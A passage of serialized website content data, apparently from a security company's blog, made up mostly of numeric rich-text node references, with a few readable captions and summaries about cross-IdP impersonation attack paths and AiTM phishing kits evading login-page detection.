alue":179987,"marks":186376,"data":186377},[],{},{"nodeType":186,"data":186379,"content":186380},{"uri":162243},[186381],{"nodeType":173,"value":179994,"marks":186382,"data":186384},[186383],{"type":194},{},{"nodeType":173,"value":179999,"marks":186386,"data":186387},[],{},{"nodeType":178,"data":186389,"content":186390},{},[186391],{"nodeType":173,"value":180006,"marks":186392,"data":186393},[],{},{"nodeType":178,"data":186395,"content":186396},{},[186397],{"nodeType":173,"value":180013,"marks":186398,"data":186399},[],{},{"nodeType":231,"data":186401,"content":186402},{},[],{"nodeType":169,"data":186404,"content":186405},{},[186406],{"nodeType":173,"value":180023,"marks":186407,"data":186409},[186408],{"type":370},{},{"nodeType":178,"data":186411,"content":186412},{},[186413,186416,186423],{"nodeType":173,"value":180031,"marks":186414,"data":186415},[],{},{"nodeType":186,"data":186417,"content":186418},{"uri":74621},[186419],{"nodeType":173,"value":180038,"marks":186420,"data":186422},[186421],{"type":194},{},{"nodeType":173,"value":180043,"marks":186424,"data":186425},[],{},{"nodeType":178,"data":186427,"content":186428},{},[186429],{"nodeType":173,"value":180050,"marks":186430,"data":186431},[],{},{"nodeType":178,"data":186433,"content":186434},{},[186435],{"nodeType":173,"value":180057,"marks":186436,"data":186437},[],{},{"nodeType":250,"data":186439,"content":186440},{},[186441,186450,186459,186468],{"nodeType":254,"data":186442,"content":186443},{},[186444],{"nodeType":178,"data":186445,"content":186446},{},[186447],{"nodeType":173,"value":180070,"marks":186448,"data":186449},[],{},{"nodeType":254,"data":186451,"content":186452},{},[186453],{"nodeType":178,"data":186454,"content":186455},{},[186456],{"nodeType":173,"value":180080,"marks":186457,"data":186458},[],{},{"nodeType":254,"data":186460,"content":186461},{},[186462],{"nodeType":178,"data":186463,"content":186464},{},[186465],{"nodeType":173,"value":180090,"marks":186466,"data":186467},[],{},{"nodeType":254,"data":186469,"content":186470},{},[186471],{"nodeType":178,"data":186472,"content":186473},{},[186474],{"nodeType":173,"value":180100,"marks":186475,"data":186476},[],{},{"nodeType":312,"data":186478,"content":186481},{"target":186479},{"sys":186480},{"id":180107,"type":317,"linkType":318},[],{"nodeType":178,"data":186483,"content":186484},{},[186485],{"nodeType":173,"value":180113,"marks":186486,"data":186487},[],{},{"nodeType":178,"data":186489,"content":186490},{},[186491,186494,186500],{"nodeType":173,"value":180120,"marks":186492,"data":186493},[],{},{"nodeType":186,"data":186495,"content":186496},{"uri":61709},[186497],{"nodeType":173,"value":180127,"marks":186498,"data":186499},[],{},{"nodeType":173,"value":180131,"marks":186501,"data":186502},[],{},{"nodeType":312,"data":186504,"content":186507},{"target":186505},{"sys":186506},{"id":180138,"type":317,"linkType":318},[],{"nodeType":178,"data":186509,"content":186510},{},[186511],{"nodeType":173,"value":37,"marks":186512,"data":186513},[],{},{"nodeType":312,"data":186515,"content":186518},{"target":186516},{"sys":186517},{"id":180150,"type":317,"linkType":318},[],{"nodeType":178,"data":186520,"content":186521},{},[186522],{"nodeType":173,"value":37,"marks":186523,"data":186524},[],{},{"entries":186526},{"hyperlink":186527,"inline":186528,"block":186529},[],[],[186530,186536,186541,186545,186548,186551,186554],{"sys":186531,"__typename":5345,"title":186532,"caption":186532,"layoutMode":118,"file":186533},{"id":179380},"Zendesk to Slack attack path (via Apple SSO)",{"url":186534,"width":132212,"height":186535},"https://images.ctfassets.net/y1cdw1ablpvd/4i4h3IKgVEPtLH5Egs8qND/4b0c1c8dea8b4c0a8721cfceb51b925d/image5.png",690,{"sys":186537,"__typename":5345,"title":186538,"caption":186538,"layoutMode":118,"file":186539},{"id":179530},"Google domain verification bypass",{"url":186540,"width":132212,"height":186535},"https://images.ctfassets.net/y1cdw1ablpvd/7EbqwEZZ6Z0J4bSmwAavvI/becb2d959771dfe75f86807779a1a933/image4.png",{"sys":186542,"__typename":5345,"title":186543,"caption":186543,"layoutMode":118,"file":186544},{"id":179601},"Generic cross-IdP impersonation attack path",{"url":184106,"width":132212,"height":186535},{"sys":186546,"__typename":5345,"title":161648,"caption":161649,"layoutMode":118,"file":186547},{"id":125630},{"url":161651,"width":11961,"height":161652},{"sys":186549,"__typename":5345,"title":182528,"caption":182528,"layoutMode":118,"file":186550},{"id":180107},{"url":182530,"width":182531,"height":182532},{"sys":186552,"__typename":127689,"title":182479,"youTubeUrl":182480,"imagePlaceholder":186553},{"id":180138},{"url":182482,"width":121106,"height":49163},{"sys":186555,"__typename":15269,"type":15270,"ctaText":186556,"buttonLabel":154894,"buttonColour":15273,"buttonUrl":61709},{"id":180150},"Learn how cross-IdP impersonation can be combined with verification phishing to bypass locked-down IdP accounts by phishing a single OTP","content:blog:cross-idp-impersonation.json","blog/cross-idp-impersonation.json","blog/cross-idp-impersonation",{"_path":186561,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":186562,"ogImage":118,"summary":186564,"title":180854,"subtitle":118,"metaTitle":186581,"synopsis":180855,"hashTags":118,"publishedDate":167649,"slug":180856,"tagsCollection":186582,"relatedBlogPostsCollection":186588,"authorsCollection":188132,"content":188136,"_id":188811,"_type":5439,"_source":5440,"_file":188812,"_stem":188813,"_extension":5439},"/blog/how-aitm-phishing-kits-evade-detection-p2",{"id":180174,"publishedAt":186563},"2024-11-18T14:40:05.446Z",{"json":186565},{"data":186566,"content":186567,"nodeType":165},{},[186568,186575],{"data":186569,"content":186570,"nodeType":178},{},[186571],{"data":186572,"marks":186573,"value":186574,"nodeType":173},{},[],"In our previous blog post, we looked at a range of techniques used by phishing kits to evade detection, implemented by a then-recent instance of the NakedPages AiTM phishing kit. Here, we’ll take a closer look at some of the more interesting techniques used by current phishing kits to break common login page detection signatures. ",{"data":186576,"content":186577,"nodeType":178},{},[186578],{"data":186579,"marks":186580,"value":13836,"nodeType":173},{},[],"How attackers defeat detections based on page signatures",{"items":186583},[186584,186586],{"sys":186585,"name":509},{"id":508},{"sys":186587,"name":505},{"id":504},{"items":186589},[186590,186876,187443],{"__typename":1528,"sys":186591,"content":186592,"title":496,"synopsis":497,"hashTags":118,"publishedDate":498,"slug":499,"tagsCollection":186866,"authorsCollection":186872},{"id":162},{"json":186593},{"nodeType":165,"data":186594,"content":186595},{},[186596,186602,186618,186631,186637,186643,186646,186652,186658,186706,186712,186717,186720,186726,186732,186738,186744,186750,186764,186769,186775,186781,186795,186800,186806,186812,186818,186824,186830,186833,186839,186855,186860],{"nodeType":169,"data":186597,"content":186598},{},[186599],{"nodeType":173,"value":174,"marks":186600,"data":186601},[],{},{"nodeType":178,"data":186603,"content":186604},{},[186605,186608,186615],{"nodeType":173,"value":182,"marks":186606,"data":186607},[],{},{"nodeType":186,"data":186609,"content":186610},{"uri":188},[186611],{"nodeType":173,"value":191,"marks":186612,"data":186614},[186613],{"type":194},{},{"nodeType":173,"value":197,"marks":186616,"data":186617},[],{},{"nodeType":178,"data":186619,"content":186620},{},[186621,186624,186628],{"nodeType":173,"value":204,"marks":186622,"data":186623},[],{},{"nodeType":173,"value":208,"marks":186625,"data":186627},[186626],{"type":194},{},{"nodeType":173,"value":213,"marks":186629,"data":186630},[],{},{"nodeType":178,"data":186632,"content":186633},{},[186634],{"nodeType":173,"value":220,"marks":186635,"data":186636},[],{},{"nodeType":178,"data":186638,"content":186639},{},[186640],{"nodeType":173,"value":227,"marks":186641,"data":186642},[],{},{"nodeType":231,"data":186644,"content":186645},{},[],{"nodeType":235,"data":186647,"content":186648},{},[186649],{"nodeType":173,"value":239,"marks":186650,"data":186651},[],{},{"nodeType":178,"data":186653,"content":186654},{},[186655],{"nodeType":173,"value":246,"marks":186656,"data":186657},[],{},{"nodeType":250,"data":186659,"content":186660},{},[186661,186670,186679,186688,186697],{"nodeType":254,"data":186662,"content":186663},{},[186664],{"nodeType":178,"data":186665,"content":186666},{},[186667],{"nodeType":173,"value":261,"marks":186668,"data":186669},[],{},{"nodeType":254,"data":186671,"content":186672},{},[186673],{"nodeType":178,"data":186674,"content":186675},{},[186676],{"nodeType":173,"value":271,"marks":186677,"data":186678},[],{},{"nodeType":254,"data":186680,"content":186681},{},[186682],{"nodeType":178,"data":186683,"content":186684},{},[186685],{"nodeType":173,"value":281,"marks":186686,"data":186687},[],{},{"nodeType":254,"data":186689,"content":186690},{},[186691],{"nodeType":178,"data":186692,"content":186693},{},[186694],{"nodeType":173,"value":291,"marks":186695,"data":186696},[],{},{"nodeType":254,"data":186698,"content":186699},{},[186700],{"nodeType":178,"data":186701,"content":186702},{},[186703],{"nodeType":173,"value":301,"marks":186704,"data":186705},[],{},{"nodeType":178,"data":186707,"content":186708},{},[186709],{"nodeType":173,"value":308,"marks":186710,"data":186711},[],{},{"nodeType":312,"data":186713,"content":186716},{"target":186714},{"sys":186715},{"id":316,"type":317,"linkType":318},[],{"nodeType":231,"data":186718,"content":186719},{},[],{"nodeType":235,"data":186721,"content":186722},{},[186723],{"nodeType":173,"value":327,"marks":186724,"data":186725},[],{},{"nodeType":178,"data":186727,"content":186728},{},[186729],{"nodeType":173,"value":334,"marks":186730,"data":186731},[],{},{"nodeType":178,"data":186733,"content":186734},{},[186735],{"nodeType":173,"value":341,"marks":186736,"data":186737},[],{},{"nodeType":178,"data":186739,"content":186740},{},[186741],{"nodeType":173,"value":348,"marks":186742,"data":186743},[],{},{"nodeType":178,"data":186745,"content":186746},{},[186747],{"nodeType":173,"value":355,"marks":186748,"data":186749},[],{},{"nodeType":235,"data":186751,"content":186752},{},[186753,186756,186761],{"nodeType":173,"value":362,"marks":186754,"data":186755},[],{},{"nodeType":173,"value":366,"marks":186757,"data":186760},[186758,186759],{"type":194},{"type":370},{},{"nodeType":173,"value":373,"marks":186762,"data":186763},[],{},{"nodeType":312,"data":186765,"content":186768},{"target":186766},{"sys":186767},{"id":380,"type":317,"linkType":318},[],{"nodeType":178,"data":186770,"content":186771},{},[186772],{"nodeType":173,"value":386,"marks":186773,"data":186774},[],{},{"nodeType":178,"data":186776,"content":186777},{},[186778],{"nodeType":173,"value":393,"marks":186779,"data":186780},[],{},{"nodeType":235,"data":186782,"content":186783},{},[186784,186787,186792],{"nodeType":173,"value":400,"marks":186785,"data":186786},[],{},{"nodeType":173,"value":404,"marks":186788,"data":186791},[186789,186790],{"type":194},{"type":370},{},{"nodeType":173,"value":410,"marks":186793,"data":186794},[],{},{"nodeType":312,"data":186796,"content":186799},{"target":186797},{"sys":186798},{"id":417,"type":317,"linkType":318},[],{"nodeType":178,"data":186801,"content":186802},{},[186803],{"nodeType":173,"value":423,"marks":186804,"data":186805},[],{},{"nodeType":178,"data":186807,"content":186808},{},[186809],{"nodeType":173,"value":430,"marks":186810,"data":186811},[],{},{"nodeType":178,"data":186813,"content":186814},{},[186815],{"nodeType":173,"value":437,"marks":186816,"data":186817},[],{},{"nodeType":178,"data":186819,"content":186820},{},[186821],{"nodeType":173,"value":444,"marks":186822,"data":186823},[],{},{"nodeType":178,"data":186825,"content":186826},{},[186827],{"nodeType":173,"value":451,"marks":186828,"data":186829},[],{},{"nodeType":231,"data":186831,"content":186832},{},[],{"nodeType":169,"data":186834,"content":186835},{},[186836],{"nodeType":173,"value":461,"marks":186837,"data":186838},[],{},{"nodeType":178,"data":186840,"content":186841},{},[186842,186845,186852],{"nodeType":173,"value":468,"marks":186843,"data":186844},[],{},{"nodeType":186,"data":186846,"content":186847},{"uri":473},[186848],{"nodeType":173,"value":476,"marks":186849,"data":186851},[186850],{"type":194},{},{"nodeType":173,"value":481,"marks":186853,"data":186854},[],{},{"nodeType":312,"data":186856,"content":186859},{"target":186857},{"sys":186858},{"id":488,"type":317,"linkType":318},[],{"nodeType":178,"data":186861,"content":186862},{},[186863],{"nodeType":173,"value":37,"marks":186864,"data":186865},[],{},{"items":186867},[186868,186870],{"sys":186869,"name":505},{"id":504},{"sys":186871,"name":509},{"id":508},{"items":186873},[186874],{"fullName":513,"firstName":71176,"jobTitle":514,"profilePicture":186875},{"url":516},{"__typename":1528,"sys":186877,"content":186878,"title":75144,"synopsis":75145,"hashTags":118,"publishedDate":75146,"slug":75147,"tagsCollection":187433,"authorsCollection":187439},{"id":74493},{"json":186879},{"nodeType":165,"data":186880,"content":186881},{},[186882,186888,186894,186914,186919,186925,186931,186934,186940,186956,186961,186967,187000,187006,187012,187018,187024,187030,187036,187051,187058,187061,187067,187073,187079,187085,187091,187097,187103,187145,187151,187157,187163,187179,187185,187191,187197,187203,187209,187215,187221,187236,187251,187290,187296,187302,187359,187365,187368,187374,187387,187402,187408,187413,187418,187421,187427],{"nodeType":178,"data":186883,"content":186884},{},[186885],{"nodeType":173,"value":74502,"marks":186886,"data":186887},[],{},{"nodeType":178,"data":186889,"content":186890},{},[186891],{"nodeType":173,"value":74509,"marks":186892,"data":186893},[],{},{"nodeType":178,"data":186895,"content":186896},{},[186897,186900,186907,186910],{"nodeType":173,"value":74516,"marks":186898,"data":186899},[],{},{"nodeType":186,"data":186901,"content":186902},{"uri":74521},[186903],{"nodeType":173,"value":74524,"marks":186904,"data":186906},[186905],{"type":194},{},{"nodeType":173,"value":74529,"marks":186908,"data":186909},[],{},{"nodeType":173,"value":74533,"marks":186911,"data":186913},[186912],{"type":370},{},{"nodeType":312,"data":186915,"content":186918},{"target":186916},{"sys":186917},{"id":74541,"type":317,"linkType":318},[],{"nodeType":178,"data":186920,"content":186921},{},[186922],{"nodeType":173,"value":74547,"marks":186923,"data":186924},[],{},{"nodeType":178,"data":186926,"content":186927},{},[186928],{"nodeType":173,"value":74554,"marks":186929,"data":186930},[],{},{"nodeType":231,"data":186932,"content":186933},{},[],{"nodeType":169,"data":186935,"content":186936},{},[186937],{"nodeType":173,"value":74564,"marks":186938,"data":186939},[],{},{"nodeType":178,"data":186941,"content":186942},{},[186943,186946,186953],{"nodeType":173,"value":74571,"marks":186944,"data":186945},[],{},{"nodeType":186,"data":186947,"content":186948},{"uri":74576},[186949],{"nodeType":173,"value":74579,"marks":186950,"data":186952},[186951],{"type":194},{},{"nodeType":173,"value":74584,"marks":186954,"data":186955},[],{},{"nodeType":312,"data":186957,"content":186960},{"target":186958},{"sys":186959},{"id":74591,"type":317,"linkType":318},[],{"nodeType":178,"data":186962,"content":186963},{},[186964],{"nodeType":173,"value":74597,"marks":186965,"data":186966},[],{},{"nodeType":178,"data":186968,"content":186969},{},[186970,186973,186979,186982,186988,186991,186997],{"nodeType":173,"value":74604,"marks":186971,"data":186972},[],{},{"nodeType":186,"data":186974,"content":186975},{"uri":74609},[186976],{"nodeType":173,"value":74612,"marks":186977,"data":186978},[],{},{"nodeType":173,"value":74616,"marks":186980,"data":186981},[],{},{"nodeType":186,"data":186983,"content":186984},{"uri":74621},[186985],{"nodeType":173,"value":74624,"marks":186986,"data":186987},[],{},{"nodeType":173,"value":74628,"marks":186989,"data":186990},[],{},{"nodeType":186,"data":186992,"content":186993},{"uri":3999},[186994],{"nodeType":173,"value":74635,"marks":186995,"data":186996},[],{},{"nodeType":173,"value":74639,"marks":186998,"data":186999},[],{},{"nodeType":178,"data":187001,"content":187002},{},[187003],{"nodeType":173,"value":74646,"marks":187004,"data":187005},[],{},{"nodeType":235,"data":187007,"content":187008},{},[187009],{"nodeType":173,"value":74653,"marks":187010,"data":187011},[],{},{"nodeType":178,"data":187013,"content":187014},{},[187015],{"nodeType":173,"value":74660,"marks":187016,"data":187017},[],{},{"nodeType":178,"data":187019,"content":187020},{},[187021],{"nodeType":173,"value":74667,"marks":187022,"data":187023},[],{},{"nodeType":178,"data":187025,"content":187026},{},[187027],{"nodeType":173,"value":74674,"marks":187028,"data":187029},[],{},{"nodeType":178,"data":187031,"content":187032},{},[187033],{"nodeType":173,"value":74681,"marks":187034,"data":187035},[],{},{"nodeType":178,"data":187037,"content":187038},{},[187039,187042,187048],{"nodeType":173,"value":74688,"marks":187040,"data":187041},[],{},{"nodeType":186,"data":187043,"content":187044},{"uri":74693},[187045],{"nodeType":173,"value":74696,"marks":187046,"data":187047},[],{},{"nodeType":173,"value":74700,"marks":187049,"data":187050},[],{},{"nodeType":178,"data":187052,"content":187053},{},[187054],{"nodeType":173,"value":74707,"marks":187055,"data":187057},[187056],{"type":370},{},{"nodeType":231,"data":187059,"content":187060},{},[],{"nodeType":169,"data":187062,"content":187063},{},[187064],{"nodeType":173,"value":74718,"marks":187065,"data":187066},[],{},{"nodeType":178,"data":187068,"content":187069},{},[187070],{"nodeType":173,"value":74725,"marks":187071,"data":187072},[],{},{"nodeType":178,"data":187074,"content":187075},{},[187076],{"nodeType":173,"value":74732,"marks":187077,"data":187078},[],{},{"nodeType":178,"data":187080,"content":187081},{},[187082],{"nodeType":173,"value":74739,"marks":187083,"data":187084},[],{},{"nodeType":178,"data":187086,"content":187087},{},[187088],{"nodeType":173,"value":74746,"marks":187089,"data":187090},[],{},{"nodeType":235,"data":187092,"content":187093},{},[187094],{"nodeType":173,"value":74753,"marks":187095,"data":187096},[],{},{"nodeType":178,"data":187098,"content":187099},{},[187100],{"nodeType":173,"value":74760,"marks":187101,"data":187102},[],{},{"nodeType":250,"data":187104,"content":187105},{},[187106,187119,187132],{"nodeType":254,"data":187107,"content":187108},{},[187109],{"nodeType":178,"data":187110,"content":187111},{},[187112,187116],{"nodeType":173,"value":74773,"marks":187113,"data":187115},[187114],{"type":370},{},{"nodeType":173,"value":74778,"marks":187117,"data":187118},[],{},{"nodeType":254,"data":187120,"content":187121},{},[187122],{"nodeType":178,"data":187123,"content":187124},{},[187125,187129],{"nodeType":173,"value":74788,"marks":187126,"data":187128},[187127],{"type":370},{},{"nodeType":173,"value":74793,"marks":187130,"data":187131},[],{},{"nodeType":254,"data":187133,"content":187134},{},[187135],{"nodeType":178,"data":187136,"content":187137},{},[187138,187142],{"nodeType":173,"value":74803,"marks":187139,"data":187141},[187140],{"type":370},{},{"nodeType":173,"value":74808,"marks":187143,"data":187144},[],{},{"nodeType":178,"data":187146,"content":187147},{},[187148],{"nodeType":173,"value":74815,"marks":187149,"data":187150},[],{},{"nodeType":235,"data":187152,"content":187153},{},[187154],{"nodeType":173,"value":74822,"marks":187155,"data":187156},[],{},{"nodeType":178,"data":187158,"content":187159},{},[187160],{"nodeType":173,"value":74829,"marks":187161,"data":187162},[],{},{"nodeType":178,"data":187164,"content":187165},{},[187166,187169,187176],{"nodeType":173,"value":74836,"marks":187167,"data":187168},[],{},{"nodeType":186,"data":187170,"content":187171},{"uri":74841},[187172],{"nodeType":173,"value":74844,"marks":187173,"data":187175},[187174],{"type":194},{},{"nodeType":173,"value":74849,"marks":187177,"data":187178},[],{},{"nodeType":178,"data":187180,"content":187181},{},[187182],{"nodeType":173,"value":74856,"marks":187183,"data":187184},[],{},{"nodeType":235,"data":187186,"content":187187},{},[187188],{"nodeType":173,"value":74863,"marks":187189,"data":187190},[],{},{"nodeType":178,"data":187192,"content":187193},{},[187194],{"nodeType":173,"value":74870,"marks":187195,"data":187196},[],{},{"nodeType":178,"data":187198,"content":187199},{},[187200],{"nodeType":173,"value":74877,"marks":187201,"data":187202},[],{},{"nodeType":178,"data":187204,"content":187205},{},[187206],{"nodeType":173,"value":74884,"marks":187207,"data":187208},[],{},{"nodeType":235,"data":187210,"content":187211},{},[187212],{"nodeType":173,"value":74891,"marks":187213,"data":187214},[],{},{"nodeType":178,"data":187216,"content":187217},{},[187218],{"nodeType":173,"value":74898,"marks":187219,"data":187220},[],{},{"nodeType":178,"data":187222,"content":187223},{},[187224,187227,187233],{"nodeType":173,"value":74905,"marks":187225,"data":187226},[],{},{"nodeType":186,"data":187228,"content":187229},{"uri":9099},[187230],{"nodeType":173,"value":74912,"marks":187231,"data":187232},[],{},{"nodeType":173,"value":1477,"marks":187234,"data":187235},[],{},{"nodeType":178,"data":187237,"content":187238},{},[187239,187242,187248],{"nodeType":173,"value":74922,"marks":187240,"data":187241},[],{},{"nodeType":186,"data":187243,"content":187244},{"uri":74693},[187245],{"nodeType":173,"value":74929,"marks":187246,"data":187247},[],{},{"nodeType":173,"value":39946,"marks":187249,"data":187250},[],{},{"nodeType":250,"data":187252,"content":187253},{},[187254,187263,187272,187281],{"nodeType":254,"data":187255,"content":187256},{},[187257],{"nodeType":178,"data":187258,"content":187259},{},[187260],{"nodeType":173,"value":74945,"marks":187261,"data":187262},[],{},{"nodeType":254,"data":187264,"content":187265},{},[187266],{"nodeType":178,"data":187267,"content":187268},{},[187269],{"nodeType":173,"value":74955,"marks":187270,"data":187271},[],{},{"nodeType":254,"data":187273,"content":187274},{},[187275],{"nodeType":178,"data":187276,"content":187277},{},[187278],{"nodeType":173,"value":74965,"marks":187279,"data":187280},[],{},{"nodeType":254,"data":187282,"content":187283},{},[187284],{"nodeType":178,"data":187285,"content":187286},{},[187287],{"nodeType":173,"value":74975,"marks":187288,"data":187289},[],{},{"nodeType":178,"data":187291,"content":187292},{},[187293],{"nodeType":173,"value":74982,"marks":187294,"data":187295},[],{},{"nodeType":178,"data":187297,"content":187298},{},[187299],{"nodeType":173,"value":74989,"marks":187300,"data":187301},[],{},{"nodeType":250,"data":187303,"content":187304},{},[187305,187323,187341],{"nodeType":254,"data":187306,"content":187307},{},[187308],{"nodeType":178,"data":187309,"content":187310},{},[187311,187314,187320],{"nodeType":173,"value":75002,"marks":187312,"data":187313},[],{},{"nodeType":186,"data":187315,"content":187316},{"uri":9099},[187317],{"nodeType":173,"value":75009,"marks":187318,"data":187319},[],{},{"nodeType":173,"value":197,"marks":187321,"data":187322},[],{},{"nodeType":254,"data":187324,"content":187325},{},[187326],{"nodeType":178,"data":187327,"content":187328},{},[187329,187332,187338],{"nodeType":173,"value":75022,"marks":187330,"data":187331},[],{},{"nodeType":186,"data":187333,"content":187334},{"uri":75027},[187335],{"nodeType":173,"value":75030,"marks":187336,"data":187337},[],{},{"nodeType":173,"value":37,"marks":187339,"data":187340},[],{},{"nodeType":254,"data":187342,"content":187343},{},[187344],{"nodeType":178,"data":187345,"content":187346},{},[187347,187350,187356],{"nodeType":173,"value":75043,"marks":187348,"data":187349},[],{},{"nodeType":186,"data":187351,"content":187352},{"uri":75048},[187353],{"nodeType":173,"value":75051,"marks":187354,"data":187355},[],{},{"nodeType":173,"value":197,"marks":187357,"data":187358},[],{},{"nodeType":178,"data":187360,"content":187361},{},[187362],{"nodeType":173,"value":75061,"marks":187363,"data":187364},[],{},{"nodeType":231,"data":187366,"content":187367},{},[],{"nodeType":169,"data":187369,"content":187370},{},[187371],{"nodeType":173,"value":75071,"marks":187372,"data":187373},[],{},{"nodeType":178,"data":187375,"content":187376},{},[187377,187380,187384],{"nodeType":173,"value":75078,"marks":187378,"data":187379},[],{},{"nodeType":173,"value":75082,"marks":187381,"data":187383},[187382],{"type":370},{},{"nodeType":173,"value":75087,"marks":187385,"data":187386},[],{},{"nodeType":178,"data":187388,"content":187389},{},[187390,187393,187399],{"nodeType":173,"value":75094,"marks":187391,"data":187392},[],{},{"nodeType":186,"data":187394,"content":187395},{"uri":75099},[187396],{"nodeType":173,"value":75102,"marks":187397,"data":187398},[],{},{"nodeType":173,"value":75106,"marks":187400,"data":187401},[],{},{"nodeType":178,"data":187403,"content":187404},{},[187405],{"nodeType":173,"value":75113,"marks":187406,"data":187407},[],{},{"nodeType":312,"data":187409,"content":187412},{"target":187410},{"sys":187411},{"id":75120,"type":317,"linkType":318},[],{"nodeType":312,"data":187414,"content":187417},{"target":187415},{"sys":187416},{"id":75126,"type":317,"linkType":318},[],{"nodeType":231,"data":187419,"content":187420},{},[],{"nodeType":169,"data":187422,"content":187423},{},[187424],{"nodeType":173,"value":40632,"marks":187425,"data":187426},[],{},{"nodeType":178,"data":187428,"content":187429},{},[187430],{"nodeType":173,"value":75141,"marks":187431,"data":187432},[],{},{"items":187434},[187435,187437],{"sys":187436,"name":509},{"id":508},{"sys":187438,"name":505},{"id":504},{"items":187440},[187441],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":187442},{"url":1496},{"__typename":1528,"sys":187444,"content":187445,"title":184068,"synopsis":184069,"hashTags":118,"publishedDate":184070,"slug":184071,"tagsCollection":188122,"authorsCollection":188128},{"id":183305},{"json":187446},{"nodeType":165,"data":187447,"content":187448},{},[187449,187454,187460,187502,187508,187514,187527,187533,187539,187608,187614,187619,187625,187631,187644,187650,187656,187676,187696,187701,187718,187724,187730,187757,187763,187769,187774,187791,187797,187803,187809,187815,187820,187837,187843,187849,187855,187861,187866,187883,187889,187895,187900,187917,187923,187929,187935,187977,187983,188044,188057,188062,188068,188074,188080,188086,188101,188107],{"nodeType":312,"data":187450,"content":187453},{"target":187451},{"sys":187452},{"id":183314,"type":317,"linkType":318},[],{"nodeType":178,"data":187455,"content":187456},{},[187457],{"nodeType":173,"value":183320,"marks":187458,"data":187459},[],{},{"nodeType":178,"data":187461,"content":187462},{},[187463,187466,187472,187475,187481,187484,187490,187493,187499],{"nodeType":173,"value":183327,"marks":187464,"data":187465},[],{},{"nodeType":186,"data":187467,"content":187468},{"uri":183332},[187469],{"nodeType":173,"value":183335,"marks":187470,"data":187471},[],{},{"nodeType":173,"value":3107,"marks":187473,"data":187474},[],{},{"nodeType":186,"data":187476,"content":187477},{"uri":183343},[187478],{"nodeType":173,"value":183346,"marks":187479,"data":187480},[],{},{"nodeType":173,"value":3107,"marks":187482,"data":187483},[],{},{"nodeType":186,"data":187485,"content":187486},{"uri":1297},[187487],{"nodeType":173,"value":183356,"marks":187488,"data":187489},[],{},{"nodeType":173,"value":3107,"marks":187491,"data":187492},[],{},{"nodeType":186,"data":187494,"content":187495},{"uri":183364},[187496],{"nodeType":173,"value":183367,"marks":187497,"data":187498},[],{},{"nodeType":173,"value":183371,"marks":187500,"data":187501},[],{},{"nodeType":178,"data":187503,"content":187504},{},[187505],{"nodeType":173,"value":183378,"marks":187506,"data":187507},[],{},{"nodeType":178,"data":187509,"content":187510},{},[187511],{"nodeType":173,"value":183385,"marks":187512,"data":187513},[],{},{"nodeType":178,"data":187515,"content":187516},{},[187517,187520,187524],{"nodeType":173,"value":183392,"marks":187518,"data":187519},[],{},{"nodeType":173,"value":183396,"marks":187521,"data":187523},[187522],{"type":370},{},{"nodeType":173,"value":1477,"marks":187525,"data":187526},[],{},{"nodeType":178,"data":187528,"content":187529},{},[187530],{"nodeType":173,"value":183407,"marks":187531,"data":187532},[],{},{"nodeType":178,"data":187534,"content":187535},{},[187536],{"nodeType":173,"value":183414,"marks":187537,"data":187538},[],{},{"nodeType":250,"data":187540,"content":187541},{},[187542,187567],{"nodeType":254,"data":187543,"content":187544},{},[187545],{"nodeType":178,"data":187546,"content":187547},{},[187548,187552,187555,187564],{"nodeType":173,"value":183427,"marks":187549,"data":187551},[187550],{"type":370},{},{"nodeType":173,"value":183432,"marks":187553,"data":187554},[],{},{"nodeType":1698,"data":187556,"content":187559},{"target":187557},{"sys":187558},{"id":183439,"type":317,"linkType":318},[187560],{"nodeType":173,"value":18649,"marks":187561,"data":187563},[187562],{"type":370},{},{"nodeType":173,"value":183446,"marks":187565,"data":187566},[],{},{"nodeType":254,"data":187568,"content":187569},{},[187570],{"nodeType":178,"data":187571,"content":187572},{},[187573,187577,187580,187586,187589,187595,187598,187605],{"nodeType":173,"value":183456,"marks":187574,"data":187576},[187575],{"type":370},{},{"nodeType":173,"value":183461,"marks":187578,"data":187579},[],{},{"nodeType":186,"data":187581,"content":187582},{"uri":183466},[187583],{"nodeType":173,"value":183469,"marks":187584,"data":187585},[],{},{"nodeType":173,"value":2936,"marks":187587,"data":187588},[],{},{"nodeType":186,"data":187590,"content":187591},{"uri":114007},[187592],{"nodeType":173,"value":183479,"marks":187593,"data":187594},[],{},{"nodeType":173,"value":183483,"marks":187596,"data":187597},[],{},{"nodeType":186,"data":187599,"content":187600},{"uri":183488},[187601],{"nodeType":173,"value":2718,"marks":187602,"data":187604},[187603],{"type":370},{},{"nodeType":173,"value":183495,"marks":187606,"data":187607},[],{},{"nodeType":178,"data":187609,"content":187610},{},[187611],{"nodeType":173,"value":183502,"marks":187612,"data":187613},[],{},{"nodeType":312,"data":187615,"content":187618},{"target":187616},{"sys":187617},{"id":169040,"type":317,"linkType":318},[],{"nodeType":169,"data":187620,"content":187621},{},[187622],{"nodeType":173,"value":183514,"marks":187623,"data":187624},[],{},{"nodeType":178,"data":187626,"content":187627},{},[187628],{"nodeType":173,"value":183521,"marks":187629,"data":187630},[],{},{"nodeType":178,"data":187632,"content":187633},{},[187634,187637,187641],{"nodeType":173,"value":183528,"marks":187635,"data":187636},[],{},{"nodeType":173,"value":18649,"marks":187638,"data":187640},[187639],{"type":370},{},{"nodeType":173,"value":183536,"marks":187642,"data":187643},[],{},{"nodeType":178,"data":187645,"content":187646},{},[187647],{"nodeType":173,"value":183543,"marks":187648,"data":187649},[],{},{"nodeType":235,"data":187651,"content":187652},{},[187653],{"nodeType":173,"value":24345,"marks":187654,"data":187655},[],{},{"nodeType":178,"data":187657,"content":187658},{},[187659,187662,187666,187669,187673],{"nodeType":173,"value":183556,"marks":187660,"data":187661},[],{},{"nodeType":173,"value":183560,"marks":187663,"data":187665},[187664],{"type":370},{},{"nodeType":173,"value":933,"marks":187667,"data":187668},[],{},{"nodeType":173,"value":183568,"marks":187670,"data":187672},[187671],{"type":370},{},{"nodeType":173,"value":1477,"marks":187674,"data":187675},[],{},{"nodeType":178,"data":187677,"content":187678},{},[187679,187682,187686,187689,187693],{"nodeType":173,"value":183579,"marks":187680,"data":187681},[],{},{"nodeType":173,"value":2740,"marks":187683,"data":187685},[187684],{"type":370},{},{"nodeType":173,"value":1464,"marks":187687,"data":187688},[],{},{"nodeType":173,"value":2748,"marks":187690,"data":187692},[187691],{"type":370},{},{"nodeType":173,"value":183594,"marks":187694,"data":187695},[],{},{"nodeType":312,"data":187697,"content":187700},{"target":187698},{"sys":187699},{"id":156217,"type":317,"linkType":318},[],{"nodeType":178,"data":187702,"content":187703},{},[187704,18770